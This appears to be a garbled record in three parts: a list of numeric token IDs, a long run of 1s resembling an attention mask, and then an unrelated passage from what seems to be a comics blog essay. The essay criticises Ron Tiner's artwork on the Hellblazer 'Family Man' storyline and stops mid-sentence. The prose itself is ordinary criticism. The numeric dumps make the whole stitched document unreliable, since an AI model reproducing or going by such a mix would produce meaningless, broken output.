310, 7875, 7805, 14000, 1098, 2548, 3449, 375, 3762, 1058, 674, 9850, 714, 304, 278, 4799, 637, 304, 1925, 373, 278, 19087, 310, 3697, 29889, 323, 2235, 1048, 278, 1556, 21863, 292, 12853, 3271, 3926, 29889, 13, 13, 18743, 10124, 317, 5800, 29892, 591, 18691, 701, 1749, 5121, 5241, 29892, 1058, 9115, 29893, 297, 515, 27903, 9459, 4412, 813, 278, 3023, 310, 502, 674, 367, 4242, 292, 322, 3902, 8253, 5164, 7600, 1623, 22080, 29871, 29896, 445, 4723, 29889, 10949, 591, 3604, 280, 1623, 322, 679, 17643, 405, 403, 322, 306, 674, 367, 2599, 263, 2586, 310, 17623, 3864, 297, 278, 5922, 29892, 577, 7952, 18515, 287, 304, 278, 12618, 363, 263, 2586, 310, 2163, 12679, 9850, 5007, 322, 20612, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
I was a killer as soon as I bought the gun We talk, us comics readers, about creative teams. The writer and artist are usually the focus, but in truly transcendent works the colourist, the letterer and the editor all contribute as much. A good team is more than the sum of its parts. That’s when it goes right, when the Fordism of American comics which breaks up one process into five different jobs finds a rhythm and a space that works. But what about when it doesn’t? When a good writer is saddled with a bad artist, with unsympathetic colouring, with misfit lettering? What happens to a writer who’s working with an artist who draws at least a page of panels in every 24-page issue that make the reader wince with pain? Is the writing dragged down with them or can it win through? Ron Tiner, who drew the Family Man storyline in Hellblazer, is such an artist. This is a disputable view; Google him and you’ll see that he was the secretary of the Society of Strip Illustrators (who pop up in Eddie Campbell’s How To Be An Artist) and that he wrote a respected reference work called Figure Drawing Without A Model. On his website, which I won’t link to because I’d rather he didn’t follow any clicks back here, he admits that Hellblazer wasn’t a pleasant experience for him. Well Ron, that goes for both of us. And, I’m confident, for most everyone else who’s read these issues. The art is flat-out bad. Faces look like badly sculpted rubber masks with popout ping-pong Muppet eyes. Characters change height from panel to panel. There’s no weight to any of the lines, no sense of what’s foreground and what’s background or where we should be looking. (The inkers change but for at least one issue it’s Mark Buckingham, known for his sleek line.) And it’s ugly, horribly ugly in the modelling, in the pacing, in the blank backgrounds which stalk the piece, in the awkward and confusing action sequences. Even Gaspar’s lettering is contorted around the art. Does it fail on every level? It can’t, otherwise this story wouldn’t have the power is has. Tiner’s storytelling shares simple virtues with Dave Gibbons’s Watchmen: the nine-panel grid, the use of multiple panels on a page depicting a character moving across a 